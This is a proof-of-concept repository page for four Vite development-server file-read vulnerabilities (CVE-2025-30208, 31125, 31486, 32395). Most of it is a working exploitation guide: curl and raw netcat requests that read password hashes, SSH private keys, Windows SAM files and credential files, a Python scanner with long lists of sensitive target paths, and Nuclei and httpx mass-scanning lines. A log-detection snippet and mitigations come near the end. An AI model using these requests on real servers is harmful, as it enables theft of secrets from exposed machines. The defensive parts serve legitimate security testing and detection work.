Associated Vulnerability
Title: Vite bypasses server.fs.deny when using `?raw??` (CVE-2025-30208)
Description: Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.
Readme
# Vite Exploitation Guide (CVE-2025-30208/31125/31486/32395)
This document summarises how the four arbitrary file read vulnerabilities in the Vite development server are exploited, with examples for Linux and Windows systems. **Note: use only in authorised security testing environments.**
## Basic principle
All four vulnerabilities in the Vite development server let an attacker bypass the `server.fs.deny` restriction and read arbitrary files on the server. Each one uses a different bypass technique, but the underlying principle is similar.
## Preconditions
All four vulnerabilities require the following conditions to be exploitable:
1. The target runs an affected version of the Vite development server
2. The development server is explicitly exposed to the network (via `--host` or the `server.host` config option)
3. For CVE-2025-32395, the server must additionally be running on Node or Bun (not Deno)
## Exploitation methods
### 1. CVE-2025-30208 (trailing separator bypass)
**Affected versions**: < 6.2.3, < 6.1.2, < 6.0.12, < 5.4.15, < 4.5.10
**Fixed versions**: 6.2.3, 6.1.2, 6.0.12, 5.4.15, 4.5.10
**How it works**: Appending the `?raw??` or `?import&raw??` query to the URL bypasses the `@fs` path restriction. Trailing separators such as `?` are stripped in several places, but the query-string regexes do not account for them.
**Linux example**:
```bash
# Read arbitrary files
curl "http://[target IP]:5173/@fs/etc/passwd?raw??"
curl "http://[target IP]:5173/@fs/etc/passwd?import&raw??"
curl "http://[target IP]:5173/@fs/var/log/auth.log?raw??"
curl "http://[target IP]:5173/@fs/home/[username]/.ssh/id_rsa?raw??"
# Check whether the vulnerability is present
curl "http://[target IP]:5173/@fs/etc/passwd" # should return 403
curl "http://[target IP]:5173/@fs/etc/passwd?raw??" # vulnerable if the file content is returned
```
**Windows example**:
```bash
# Read arbitrary files
curl "http://[target IP]:5173/@fs/C:/Windows/win.ini?raw??"
curl "http://[target IP]:5173/@fs/C:/Windows/system32/drivers/etc/hosts?raw??"
curl "http://[target IP]:5173/@fs/C:/Users/Administrator/Desktop/credentials.txt?raw??"
curl "http://[target IP]:5173/@fs/C:/inetpub/wwwroot/web.config?raw??"
# Check whether the vulnerability is present
curl "http://[target IP]:5173/@fs/C:/Windows/win.ini" # should return 403
curl "http://[target IP]:5173/@fs/C:/Windows/win.ini?raw??" # vulnerable if the file content is returned
```
### 2. CVE-2025-31125 (specific import method bypass)
**Affected versions**: same as CVE-2025-30208
**Fixed versions**: same as CVE-2025-30208
**How it works**: Using specific import methods, such as `?inline&import` or `?raw?import`, bypasses the `server.fs.deny` configuration.
**Linux example**:
```bash
# Read arbitrary files
curl "http://[target IP]:5173/@fs/etc/passwd?inline&import"
curl "http://[target IP]:5173/@fs/etc/passwd?raw?import"
curl "http://[target IP]:5173/@fs/etc/shadow?inline&import"
curl "http://[target IP]:5173/@fs/proc/self/environ?inline&import"
# Check whether the vulnerability is present
curl "http://[target IP]:5173/@fs/etc/passwd" # should return 403
curl "http://[target IP]:5173/@fs/etc/passwd?inline&import" # vulnerable if the file content is returned
```
**Windows example**:
```bash
# Read arbitrary files
curl "http://[target IP]:5173/@fs/C:/Windows/win.ini?inline&import"
curl "http://[target IP]:5173/@fs/C:/Windows/system32/drivers/etc/hosts?inline&import"
curl "http://[target IP]:5173/@fs/C:/Program Files/MySQL/MySQL Server 8.0/my.ini?inline&import"
curl "http://[target IP]:5173/@fs/C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt?inline&import"
# Check whether the vulnerability is present
curl "http://[target IP]:5173/@fs/C:/Windows/win.ini" # should return 403
curl "http://[target IP]:5173/@fs/C:/Windows/win.ini?inline&import" # vulnerable if the file content is returned
```
### 3. CVE-2025-31486 (SVG and relative path bypass)
**Affected versions**: < 6.2.5, < 6.1.4, < 6.0.14, < 5.4.17, < 4.5.12
**Fixed versions**: 6.2.5, 6.1.4, 6.0.14, 5.4.17, 4.5.12
**How it works**:
1. **SVG bypass**: appending `?.svg?.wasm?init`, or sending a `sec-fetch-dest: script` header, bypasses the restriction check for `.svg` files
2. **Relative path bypass**: the check runs before ID normalisation, so a relative path (such as `../../`) bypasses the restriction
**Linux example**:
```bash
# SVG bypass
curl "http://[target IP]:5173/etc/passwd?.svg?.wasm?init"
curl -H "sec-fetch-dest: script" "http://[target IP]:5173/etc/passwd?.svg"
curl "http://[target IP]:5173/etc/nginx/nginx.conf?.svg?.wasm?init"
curl "http://[target IP]:5173/var/www/html/config.php?.svg?.wasm?init"
# Relative path bypass
curl "http://[target IP]:5173/@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?raw"
curl "http://[target IP]:5173/@fs/x/x/x/vite-project/?/../../../../../etc/shadow?import&?raw"
curl "http://[target IP]:5173/@fs/x/x/x/vite-project/?/../../../../../var/log/auth.log?import&?raw"
# Check whether the vulnerability is present
curl "http://[target IP]:5173/etc/passwd" # should return 404
curl "http://[target IP]:5173/etc/passwd?.svg?.wasm?init" # vulnerable if the file content is returned
```
**Windows example**:
```bash
# SVG bypass
curl "http://[target IP]:5173/C:/Windows/win.ini?.svg?.wasm?init"
curl -H "sec-fetch-dest: script" "http://[target IP]:5173/C:/Windows/win.ini?.svg"
curl "http://[target IP]:5173/C:/inetpub/wwwroot/web.config?.svg?.wasm?init"
curl "http://[target IP]:5173/C:/Windows/Panther/Unattend.xml?.svg?.wasm?init"
# Relative path bypass
curl "http://[target IP]:5173/@fs/x/x/x/vite-project/?/../../../../../C:/Windows/win.ini?import&?raw"
curl "http://[target IP]:5173/@fs/x/x/x/vite-project/?/../../../../../C:/Windows/system32/drivers/etc/hosts?import&?raw"
curl "http://[target IP]:5173/@fs/x/x/x/vite-project/?/../../../../../C:/Users/Administrator/Desktop/credentials.txt?import&?raw"
# Check whether the vulnerability is present
curl "http://[target IP]:5173/C:/Windows/win.ini" # should return 404
curl "http://[target IP]:5173/C:/Windows/win.ini?.svg?.wasm?init" # vulnerable if the file content is returned
```
**Note**: The SVG bypass only works when the file is smaller than `build.assetsInlineLimit` (default 4kB) and Vite 6.0+ is in use.
### 4. CVE-2025-32395 (invalid request-target bypass)
**Affected versions**: < 6.2.6, < 6.1.5, < 6.0.15, < 5.4.18, < 4.5.13
**Fixed versions**: 6.2.6, 6.1.5, 6.0.15, 5.4.18, 4.5.13
**How it works**: The HTTP/1.1 specification does not allow the `#` character in the `request-target`. The Node and Bun runtimes do not reject such requests internally, so `http.IncomingMessage.url` contains the `#`, while Vite's `server.fs.deny` check assumes `req.url` never contains `#`.
**Linux example**:
```bash
# Use curl's --request-target option
curl --request-target "/@fs/Users/[username]/Desktop/vite-project/#/../../../../../etc/passwd" "http://[target IP]:5173"
curl --request-target "/@fs/Users/[username]/Desktop/vite-project/#/../../../../../etc/shadow" "http://[target IP]:5173"
curl --request-target "/@fs/Users/[username]/Desktop/vite-project/#/../../../../../var/www/html/wp-config.php" "http://[target IP]:5173"
# Or send a raw HTTP request
echo -e "GET /@fs/Users/[username]/Desktop/vite-project/#/../../../../../etc/passwd HTTP/1.1\r\nHost: [target IP]:5173\r\nConnection: close\r\n\r\n" | nc [target IP] 5173
echo -e "GET /@fs/Users/[username]/Desktop/vite-project/#/../../../../../etc/shadow HTTP/1.1\r\nHost: [target IP]:5173\r\nConnection: close\r\n\r\n" | nc [target IP] 5173
# Check whether the vulnerability is present
curl "http://[target IP]:5173/@fs/etc/passwd" # should return 403
curl --request-target "/@fs/x/#/../../../../../etc/passwd" "http://[target IP]:5173" # vulnerable if the file content is returned
```
**Windows example**:
```bash
# Use curl's --request-target option
curl --request-target "/@fs/Users/[username]/Desktop/vite-project/#/../../../../../C:/Windows/win.ini" "http://[target IP]:5173"
curl --request-target "/@fs/Users/[username]/Desktop/vite-project/#/../../../../../C:/Windows/system32/drivers/etc/hosts" "http://[target IP]:5173"
curl --request-target "/@fs/Users/[username]/Desktop/vite-project/#/../../../../../C:/inetpub/wwwroot/web.config" "http://[target IP]:5173"
curl --request-target "/@fs/Users/[username]/Desktop/vite-project/#/../../../../../C:/Program Files/Microsoft SQL Server/MSSQL15.SQLEXPRESS/MSSQL/DATA/master.mdf" "http://[target IP]:5173"
# Or send a raw HTTP request
echo -e "GET /@fs/Users/[username]/Desktop/vite-project/#/../../../../../C:/Windows/win.ini HTTP/1.1\r\nHost: [target IP]:5173\r\nConnection: close\r\n\r\n" | nc [target IP] 5173
echo -e "GET /@fs/Users/[username]/Desktop/vite-project/#/../../../../../C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt HTTP/1.1\r\nHost: [target IP]:5173\r\nConnection: close\r\n\r\n" | nc [target IP] 5173
# Check whether the vulnerability is present
curl "http://[target IP]:5173/@fs/C:/Windows/win.ini" # should return 403
curl --request-target "/@fs/x/#/../../../../../C:/Windows/win.ini" "http://[target IP]:5173" # vulnerable if the file content is returned
```
**Note**: This vulnerability only affects Vite servers running on Node or Bun (not Deno).
## Combined exploit script
The following Python script automatically checks whether a target is affected by any of the four vulnerabilities, and includes additional test paths:
```python
#!/usr/bin/env python3
# This script is made by "nkuty"
import requests
import argparse
import sys
import socket
import random
import string
import urllib.parse
from urllib3.exceptions import InsecureRequestWarning

# Disable SSL warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def check_vite_vulnerabilities(target_url):
    if not target_url.startswith('http'):
        target_url = f"http://{target_url}"
    if target_url.endswith('/'):
        target_url = target_url[:-1]
    # Parse the URL to get host and port
    parsed_url = urllib.parse.urlparse(target_url)
    host = parsed_url.hostname
    port = parsed_url.port
    # If no port was given, use the scheme's default
    if port is None:
        port = 443 if parsed_url.scheme == 'https' else 80
    print(f"[*] 测试目标: {target_url} (主机: {host}, 端口: {port})")
    # Extended Linux test paths
    linux_test_paths = [
        "/etc/passwd",
        "/etc/shadow",
        "/etc/hosts",
        "/etc/nginx/nginx.conf",
        "/var/www/html/config.php",
        "/var/www/html/wp-config.php",
        "/home/admin/.ssh/id_rsa",
        "/home/ubuntu/.ssh/id_rsa",
        "/root/.ssh/id_rsa",
        "/proc/self/environ",
        "/var/log/auth.log",
        "/etc/crontab",
        "/etc/mysql/my.cnf",
        "/var/www/html/.env",
        "/opt/tomcat/conf/server.xml"
    ]
    # Extended Windows test paths
    windows_test_paths = [
        "C:/Windows/win.ini",
        "C:/Windows/system32/drivers/etc/hosts",
        "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt",
        "C:/inetpub/wwwroot/web.config",
        "C:/Program Files/MySQL/MySQL Server 8.0/my.ini",
        "C:/Users/Administrator/.ssh/id_rsa",
        "C:/Windows/Panther/Unattend.xml",
        "C:/xampp/php/php.ini",
        "C:/Program Files/Microsoft SQL Server/MSSQL15.SQLEXPRESS/MSSQL/DATA/master.mdf",
        "C:/Users/Administrator/Desktop/credentials.txt",
        "C:/ProgramData/MySQL/MySQL Server 8.0/Data/ibdata1",
        "C:/Windows/System32/config/SAM",
        "C:/Windows/repair/SAM",
        "C:/Windows/debug/NetSetup.log",
        "C:/Windows/iis6.log"
    ]
    # All test paths
    all_test_paths = linux_test_paths + windows_test_paths
    vulnerabilities = {
        "CVE-2025-30208": [
            "/@fs{path}?raw??",
            "/@fs{path}?import&raw??"
        ],
        "CVE-2025-31125": [
            "/@fs{path}?inline&import",
            "/@fs{path}?raw?import"
        ],
        "CVE-2025-31486": [
            "{path}?.svg?.wasm?init",
            "/@fs/x/x/x/vite-project/?/../../../../../{path}?import&?raw"
        ],
        "CVE-2025-32395": [
            "/@fs/x/#/../../../../../{path}"
        ]
    }
    # First check whether the basic path is reachable
    try:
        r = requests.get(f"{target_url}/@vite/client", timeout=5, verify=False)
        if r.status_code != 200:
            print(f"[-] 目标可能不是Vite服务器,未找到/@vite/client路径")
            # Try other possible Vite fingerprints
            r = requests.get(f"{target_url}", timeout=5, verify=False)
            if "vite" not in r.text.lower() and "dev server" not in r.text.lower():
                print(f"[-] 目标页面内容中未找到Vite相关标识")
                print(f"[*] 继续测试漏洞,忽略Vite标识检查...")
        else:
            print(f"[+] 确认目标是Vite服务器")
    except Exception as e:
        print(f"[-] 连接错误: {e}")
        print(f"[*] 继续测试漏洞,忽略连接错误...")
    # Generate a random file name for a non-existent file (to detect false positives)
    random_filename = ''.join(random.choice(string.ascii_lowercase) for i in range(10))
    random_test = f"/tmp/{random_filename}.txt"

    # Test CVE-2025-32395 (needs a hand-built HTTP request)
    def test_cve_2025_32395(path):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(5)
            s.connect((host, port))
            # Build the request
            protocol = "HTTP/1.1"
            request = f"GET /@fs/x/#/../../../../../{path} {protocol}\r\nHost: {host}:{port}\r\nConnection: close\r\n\r\n"
            # For HTTPS, wrap the socket in TLS
            if parsed_url.scheme == 'https':
                import ssl
                context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
                context.check_hostname = False
                context.verify_mode = ssl.CERT_NONE
                s = context.wrap_socket(s, server_hostname=host)
            s.send(request.encode())
            response = b""
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                response += chunk
            s.close()
            response_text = response.decode('utf-8', errors='ignore')
            # Check whether the file was read successfully
            if "HTTP/1.1 200" in response_text:
                content = response_text.split('\r\n\r\n')[1] if '\r\n\r\n' in response_text else ""
                if is_valid_file_content(path, content):
                    print(f"[+] 发现漏洞 CVE-2025-32395! 路径: {path}")
                    print(f"[+] 响应内容预览: {content[:100]}...")
                    return True
        except Exception as e:
            print(f"[-] 测试 CVE-2025-32395 路径 {path} 时出错: {e}")
        return False

    # Check whether the returned content looks like the requested file
    def is_valid_file_content(path, content):
        if not content:
            return False
        # Check content signatures by file type
        if "passwd" in path and ("root:" in content or "nobody:" in content):
            return True
        elif "shadow" in path and ("root:" in content or "$" in content):
            return True
        elif "win.ini" in path and ("for 16-bit app support" in content or "[fonts]" in content):
            return True
        elif "hosts" in path and ("localhost" in content or "127.0.0.1" in content):
            return True
        elif ".ssh/id_rsa" in path and ("BEGIN" in content and "PRIVATE KEY" in content):
            return True
        elif "web.config" in path and ("<configuration" in content or "<connectionStrings" in content):
            return True
        elif ".php" in path and ("<?php" in content or "$" in content):
            return True
        elif ".env" in path and ("=" in content):
            return True
        elif ".xml" in path and ("<" in content and ">" in content):
            return True
        elif ".ini" in path and ("[" in content and "]" in content):
            return True
        elif ".log" in path and (len(content) > 10):
            return True
        elif ".txt" in path and (len(content) > 5):
            return True
        elif ".mdf" in path and (not content.isprintable()):  # binary file
            return True
        # Generic check: content is non-empty and is not an error message
        return len(content) > 10 and "error" not in content.lower() and "not found" not in content.lower()

    # Test every vulnerability and path
    found_vulnerabilities = []
    # Test CVE-2025-32395 first, since it needs special handling
    for path in all_test_paths:
        if test_cve_2025_32395(path):
            found_vulnerabilities.append(("CVE-2025-32395", path))
            break
    # Test the remaining vulnerabilities
    for cve, templates in vulnerabilities.items():
        if cve == "CVE-2025-32395":
            continue  # already tested above
        for path in all_test_paths:
            for template in templates:
                try:
                    url = f"{target_url}{template.format(path=path)}"
                    r = requests.get(url, timeout=5, verify=False)
                    if r.status_code == 200 and is_valid_file_content(path, r.text):
                        print(f"[+] 发现漏洞 {cve}! 路径: {path}, 模板: {template}")
                        print(f"[+] 响应内容预览: {r.text[:100]}...")
                        found_vulnerabilities.append((cve, path))
                        break
                except Exception as e:
                    print(f"[-] 测试 {cve} 路径 {path} 模板 {template} 时出错: {e}")
            if any(cve == v[0] for v in found_vulnerabilities):
                break  # once this CVE is confirmed, skip the remaining paths
    # Request the random file name to check for false positives
    false_positives = []
    for cve, templates in vulnerabilities.items():
        if cve == "CVE-2025-32395":
            continue
        for template in templates:
            try:
                url = f"{target_url}{template.format(path=random_test)}"
                r = requests.get(url, timeout=5, verify=False)
                if r.status_code == 200 and len(r.text) > 10:
                    false_positives.append(cve)
                    break
            except Exception:
                pass
    # Report results
    if found_vulnerabilities:
        print("\n[+] 漏洞检测结果:")
        for cve, path in found_vulnerabilities:
            if cve in false_positives:
                print(f"    [-] {cve}: 可能存在误报,请手动验证")
            else:
                print(f"    [+] {cve}: 确认存在漏洞,可访问 {path}")
        return True
    else:
        print("[-] 未发现漏洞或目标已修复")
        return False


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Vite漏洞检测工具')
    parser.add_argument('target', help='目标URL,例如: python3 vite_vulnerability_scanner.py http://example.com:5173')
    args = parser.parse_args()
    check_vite_vulnerabilities(args.target)
```
>## How to use the script
>
>1. **Save the script**:
>
>   - Copy the script into a new file, for example `vite_vulnerability_scanner.py`
>   - Make sure it is saved with UTF-8 encoding
>
>2. **Install dependencies**:
>
>   ```
>   pip install requests argparse urllib3
>   ```
>
>3. **Make it executable** (Linux/Mac):
>
>   ```
>   chmod +x vite_vulnerability_scanner.py
>   ```
>
>4. **Run the script**:
>
>   ```
>   # Basic usage
>   python3 vite_vulnerability_scanner.py http://[target IP]:5173
>
>   # Or, if you made it executable
>   ./vite_vulnerability_scanner.py http://[target IP]:5173
>   ```
>
>5. **Show help**:
>
>   ```
>   python vite_vulnerability_scanner.py -h
>   ```

## Common sensitive file paths
### Linux
```
/etc/passwd # user account information
/etc/shadow # password hashes (requires privileges)
/etc/hosts # host mappings
/etc/nginx/nginx.conf # Nginx configuration
/etc/apache2/apache2.conf # Apache configuration
/var/www/html/config.php # PHP configuration file
/var/www/html/wp-config.php # WordPress configuration
/var/www/html/.env # environment variables file
/home/[username]/.ssh/id_rsa # SSH private key
/home/[username]/.bash_history # Bash command history
/proc/self/environ # process environment variables
/var/log/auth.log # authentication log
/etc/crontab # scheduled tasks
/etc/mysql/my.cnf # MySQL configuration
/opt/tomcat/conf/server.xml # Tomcat configuration
/etc/redis/redis.conf # Redis configuration
/var/lib/jenkins/secrets/ # Jenkins secrets
/var/www/html/application/config/database.php # CodeIgniter database configuration
/var/www/html/sites/default/settings.php # Drupal configuration
```
### Windows
```
C:/Windows/win.ini # basic Windows information
C:/Windows/system32/drivers/etc/hosts # host mappings
C:/Windows/Panther/Unattend.xml # setup configuration (may contain credentials)
C:/Windows/System32/config/SAM # user account database (requires privileges)
C:/Windows/repair/SAM # SAM backup (may exist)
C:/Windows/debug/NetSetup.log # network setup log
C:/inetpub/wwwroot/web.config # IIS site configuration
C:/inetpub/logs/LogFiles/ # IIS logs
C:/Program Files/MySQL/MySQL Server 8.0/my.ini # MySQL configuration
C:/xampp/php/php.ini # XAMPP PHP configuration
C:/Users/[username]/.ssh/id_rsa # SSH private key
C:/Users/[username]/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt # PowerShell history
C:/Users/[username]/AppData/Roaming/Microsoft/Credentials/ # stored credentials
C:/Users/[username]/AppData/Local/Microsoft/Windows/INetCache/ # IE/Edge cache
C:/Program Files/Microsoft SQL Server/MSSQL15.SQLEXPRESS/MSSQL/DATA/master.mdf # SQL Server data file
C:/ProgramData/MySQL/MySQL Server 8.0/Data/ibdata1 # MySQL data file
C:/Users/Administrator/Desktop/credentials.txt # possible credentials file
C:/Windows/System32/inetsrv/config/applicationHost.config # IIS application configuration
C:/Windows/iis6.log # IIS log
```
## Detection tools
Besides the Python script above, the following tools can also detect these vulnerabilities:
1. **Nuclei template**:
```yaml
id: vite-file-read-vulnerabilities

info:
  name: Vite Development Server - Arbitrary File Read
  author: security-researcher
  severity: high
  description: Detects multiple arbitrary file read vulnerabilities in Vite development server
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-30208
    - https://nvd.nist.gov/vuln/detail/CVE-2025-31486
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32395

requests:
  - method: GET
    path:
      # Linux paths
      - "{{BaseURL}}/@fs/etc/passwd?raw??"
      - "{{BaseURL}}/@fs/etc/passwd?import&raw??"
      - "{{BaseURL}}/@fs/etc/passwd?inline&import"
      - "{{BaseURL}}/@fs/etc/passwd?raw?import"
      - "{{BaseURL}}/etc/passwd?.svg?.wasm?init"
      - "{{BaseURL}}/@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?raw"
      # Windows paths
      - "{{BaseURL}}/@fs/C:/Windows/win.ini?raw??"
      - "{{BaseURL}}/@fs/C:/Windows/win.ini?import&raw??"
      - "{{BaseURL}}/@fs/C:/Windows/win.ini?inline&import"
      - "{{BaseURL}}/@fs/C:/Windows/win.ini?raw?import"
      - "{{BaseURL}}/C:/Windows/win.ini?.svg?.wasm?init"
      - "{{BaseURL}}/@fs/x/x/x/vite-project/?/../../../../../C:/Windows/win.ini?import&?raw"
    matchers-condition: or
    matchers:
      # Linux file content match
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body
      # Windows file content match
      - type: word
        words:
          - "for 16-bit app support"
          - "[fonts]"
        condition: or
        part: body
      # Generic match
      - type: word
        words:
          - "export default"
        condition: and
        part: body
```
2. **Using httpx**:
```bash
# Linux path tests
cat targets.txt | httpx -path "/@fs/etc/passwd?raw??" -mc 200 -match-regex "root:"
cat targets.txt | httpx -path "/@fs/etc/shadow?raw??" -mc 200 -match-regex "\$"
cat targets.txt | httpx -path "/etc/passwd?.svg?.wasm?init" -mc 200 -match-regex "root:"
# Windows path tests
cat targets.txt | httpx -path "/@fs/C:/Windows/win.ini?raw??" -mc 200 -match-regex "for 16-bit app support"
cat targets.txt | httpx -path "/@fs/C:/Windows/system32/drivers/etc/hosts?raw??" -mc 200 -match-regex "localhost"
cat targets.txt | httpx -path "/C:/Windows/win.ini?.svg?.wasm?init" -mc 200 -match-regex "for 16-bit app support"
```
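The scanners above probe a server; the other side of detection is spotting these requests in traffic. The following Node.js snippet is an added example (not part of the original README or its scanner) that classifies request targets from an access log against the bypass signatures documented in this guide. It assumes the dev server sits behind a reverse proxy that records the raw request-target in combined log format (a browser strips `#` before sending, so the CVE-2025-32395 signature only shows up in raw request-target logging); the log lines are constructed.

```javascript
// Added detection example; not from the original README or from Vite itself.
// Each signature is one of the bypass patterns documented in this guide.
const SIGNATURES = [
  // CVE-2025-30208: trailing "?" separators after a raw/import query
  { cve: "CVE-2025-30208", match: (t) => /\?(?:import&)?raw\?\?/.test(t) },
  // CVE-2025-31125: specific import-style queries on /@fs/ paths
  { cve: "CVE-2025-31125", match: (t) => /\?(?:inline&import|raw\?import)\b/.test(t) },
  // CVE-2025-31486: fake .svg/.wasm suffix, or "/?/../" traversal before normalisation
  { cve: "CVE-2025-31486", match: (t) => /\?\.svg(?:\?\.wasm\?init)?(?:$|[?&])/.test(t) || /\/\?\/(?:\.\.\/)+/.test(t) },
  // CVE-2025-32395: "#" inside the request-target, which a browser never sends
  { cve: "CVE-2025-32395", match: (t) => t.includes("#") },
];

// Return the CVE ids whose signature appears in a single request-target.
function classifyRequestTarget(target) {
  return SIGNATURES.filter((s) => s.match(target)).map((s) => s.cve);
}

// Combined-log-style line: <client> - - [<time>] "<METHOD> <target> HTTP/x" <status> <bytes>
// The target is taken as one non-space token (spaces are percent-encoded on the wire).
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)/;

function parseLogLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return { client: m[1], time: m[2], method: m[3], target: m[4], status: Number(m[5]) };
}

// Report every flagged request. A 200 on a flagged target is the strongest signal
// (the file was likely served); a 403/404 still records a probe worth investigating.
function scanAccessLog(lines) {
  const hits = [];
  for (const line of lines) {
    const req = parseLogLine(line);
    if (!req) continue;
    const cves = classifyRequestTarget(req.target);
    if (cves.length === 0) continue;
    hits.push({ client: req.client, target: req.target, status: req.status, cves, likelyRead: req.status === 200 });
  }
  return hits;
}

// Constructed sample log (not captured from a real server); the last two lines are
// ordinary Vite dev-server requests and must not be flagged.
const SAMPLE_LOG = [
  '203.0.113.7 - - [01/Apr/2025:10:00:01 +0000] "GET /@fs/etc/passwd?raw?? HTTP/1.1" 200 1842',
  '203.0.113.7 - - [01/Apr/2025:10:00:02 +0000] "GET /@fs/etc/passwd HTTP/1.1" 403 0',
  '203.0.113.7 - - [01/Apr/2025:10:00:03 +0000] "GET /etc/passwd?.svg?.wasm?init HTTP/1.1" 200 2101',
  '203.0.113.7 - - [01/Apr/2025:10:00:04 +0000] "GET /@fs/x/#/../../../../../etc/passwd HTTP/1.1" 200 1842',
  '198.51.100.4 - - [01/Apr/2025:10:00:05 +0000] "GET /src/main.ts?import HTTP/1.1" 200 512',
  '198.51.100.4 - - [01/Apr/2025:10:00:06 +0000] "GET /src/logo.svg?import HTTP/1.1" 200 900',
];

const REPORT = scanAccessLog(SAMPLE_LOG);
console.log(JSON.stringify(REPORT, null, 2));
```

Regular `?import` and `.svg?import` requests that Vite issues for project files are left alone; only the malformed query shapes and the `#` request-target are flagged.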
## Mitigations
1. **Update Vite immediately**:
   - Upgrade to 6.2.6+, 6.1.5+, 6.0.15+, 5.4.18+ or 4.5.13+
2. **Limit network exposure**:
   - Do not use the Vite development server in production
   - Avoid the `--host` and `server.host` config options
   - If exposure is unavoidable, restrict the source IPs with a firewall
3. **Harden the configuration**:
   - Use `server.fs.strict: true`
   - Configure the `server.fs.allow` and `server.fs.deny` lists explicitly
   - Consider `server.fs.deny: ['**']` to block file system access entirely
4. **Runtime safety**:
   - Consider running Vite on Deno rather than Node/Bun (per the CVE-2025-32395 finding)
   - Run the Vite service under the principle of least privilege
**Disclaimer**: This document is for authorised security testing and educational purposes only. Testing systems without authorisation is illegal.
File Snapshot
[4.0K] /data/pocs/0d2636b06d0fe0106dfa0d81b5253a3f31546762
├── [4.0K] png
│ └── [125K] 屏幕截图 .png
├── [ 25K] README.md
└── [9.8K] vite_vulnerability_scanner.py
1 directory, 3 files